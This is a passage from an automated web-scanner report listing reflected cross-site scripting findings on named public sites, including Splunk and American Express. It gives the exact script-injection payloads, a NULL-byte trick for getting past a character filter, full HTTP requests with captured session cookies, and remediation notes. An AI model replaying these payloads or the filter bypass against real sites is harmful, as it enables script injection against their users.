__kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:59 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: d42be96bfaed903e63bc16d7304816981296944040 Last-Modified: Sat, 05 Feb 2011 22:14:00 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload b7936--><script>alert(1)</script>598904f8a80 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /b7936--><script>alert(1)</script>598904f8a80 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:15:24 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18271
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b31a7"><script>alert(1)</script>dcf6a3828c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wikib31a7"><script>alert(1)</script>dcf6a3828c3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="lt ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/wikib31a7"><script>alert(1)</script>dcf6a3828c3"> ...[SNIP]...
4.630. http://www.splunk.com/wiki [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/wiki
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 671a4"><script>alert(1)</script>b97d19aca39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wiki?671a4"><script>alert(1)</script>b97d19aca39=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into an HTML comment. The payload 5d79e--><script>alert(1)</script>01e99964339 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /5d79e--><script>alert(1)</script>01e99964339/ HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8a7d"><script>alert(1)</script>25cf03b96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wikia8a7d"><script>alert(1)</script>25cf03b96/ HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="lt ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/wikia8a7d"><script>alert(1)</script>25cf03b96/"> ...[SNIP]...
4.633. http://www.splunk.com/wiki/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/wiki/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5aa3"><script>alert(1)</script>5ac65bd0135 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wiki/?f5aa3"><script>alert(1)</script>5ac65bd0135=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of the ipid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58b7c"><script>alert(1)</script>3fc5507d4ef was submitted in the ipid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whatisIntelliTXT.asp?ipid=${ipid}58b7c"><script>alert(1)</script>3fc5507d4ef&cc=${cc}&server=${itxtserver} HTTP/1.1 Host: www.vibrantmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 92299 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQADSARBD=OEOFFMCCAJGDINNJNMLCLBJJ; path=/ p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 22:20:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <titl ...[SNIP]... <input type="hidden" name="IPID" value="${ipid}58b7c"><script>alert(1)</script>3fc5507d4ef"> ...[SNIP]...
4.635. http://www.yasni.de/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.yasni.de
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46fac"><script>alert(1)</script>e05d79885fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?46fac"><script>alert(1)</script>e05d79885fa=1 HTTP/1.1 Host: www.yasni.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" ...[SNIP]... <a href="http://www.yasni.com/?46fac"><script>alert(1)</script>e05d79885fa=1" id="region_selector_1"> ...[SNIP]...
4.636. http://www201.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www201.americanexpress.com
Path:
/business-credit-cards/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51791"%3balert(1)//2c5fab680ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51791";alert(1)//2c5fab680ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/?51791"%3balert(1)//2c5fab680ef=1 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>OPEN from Amer ...[SNIP]... <script type="text/javascript"> var aj_queryString = "51791";alert(1)//2c5fab680ef=1"; </script> ...[SNIP]...
4.637. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www201.americanexpress.com
Path:
/business-credit-cards/business-credit-cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d3c5c"><script>alert(1)</script>9d3d18fb0de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3c5c"><script>alert(1)</script>9d3d18fb0de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-credit-cards/business-credit-cards?%00d3c5c"><script>alert(1)</script>9d3d18fb0de=1 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
4.638. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www201.americanexpress.com
Path:
/business-credit-cards/business-credit-cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5066f"%3balert(1)//690f9898938 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5066f";alert(1)//690f9898938 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/business-credit-cards?5066f"%3balert(1)//690f9898938=1 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the source request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11129"%3balert(1)//b90a4cedfda was submitted in the source parameter. This input was echoed as 11129";alert(1)//b90a4cedfda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards11129"%3balert(1)//b90a4cedfda HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0076500"><script>alert(1)</script>a5c89817fba was submitted in the source parameter. This input was echoed as 76500"><script>alert(1)</script>a5c89817fba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards%0076500"><script>alert(1)</script>a5c89817fba HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the sj_tabToOpen request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 39d09%3balert(1)//115a6676ff2 was submitted in the sj_tabToOpen parameter. This input was echoed as 39d09;alert(1)//115a6676ff2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /getthecard/home?sj_tabToOpen=139d09%3balert(1)//115a6676ff2&inav=menu_cards_pc_choosecard HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:37 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944497780574; path=/; expires=Tue, 09-Feb-16 22:21:37 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=00004_Nr3XAINdJiQ4686YkMRWA:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <script src="htt ...[SNIP]... <script type="text/javascript"> var sj_responseText=""; var sj_rsvpStatus=""; var sj_offerURL=""; var sj_rsvpAttempts= 0; var sj_pageContext="Prospect"; var sj_tabToOpen = 139d09;alert(1)//115a6676ff2; var sj_modalToOpen = "null"; var sj_servername = "www201.americanexpress.com"; </script> ...[SNIP]...
4.642. http://zh-hans.splunk.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://zh-hans.splunk.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a66ee--><script>alert(1)</script>025dd4411ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?a66ee--><script>alert(1)</script>025dd4411ca=1 HTTP/1.1 Host: zh-hans.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9c7aa--><script>alert(1)</script>a53113444e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 2 is copied into an HTML comment. The payload 84a20--><script>alert(1)</script>2a86be04e00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into an HTML comment. The payload 46954--><script>alert(1)</script>05131f54977 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 2 is copied into an HTML comment. The payload d75ee--><script>alert(1)</script>e4c16a81498 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 3 is copied into an HTML comment. The payload 7e755--><script>alert(1)</script>b7071ccc3b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 4 is copied into an HTML comment. The payload ee6a6--><script>alert(1)</script>abc43d08165 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
4.649. http://zh-hant.splunk.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://zh-hant.splunk.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload fa491--><script>alert(1)</script>4e7b580ded4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?fa491--><script>alert(1)</script>4e7b580ded4=1 HTTP/1.1 Host: zh-hant.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into an HTML comment. The payload 882df--><script>alert(1)</script>c4b14aa1456 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 2 is copied into an HTML comment. The payload f592a--><script>alert(1)</script>443b4bd4ac9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into an HTML comment. The payload c22a7--><script>alert(1)</script>3c3d1be04b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
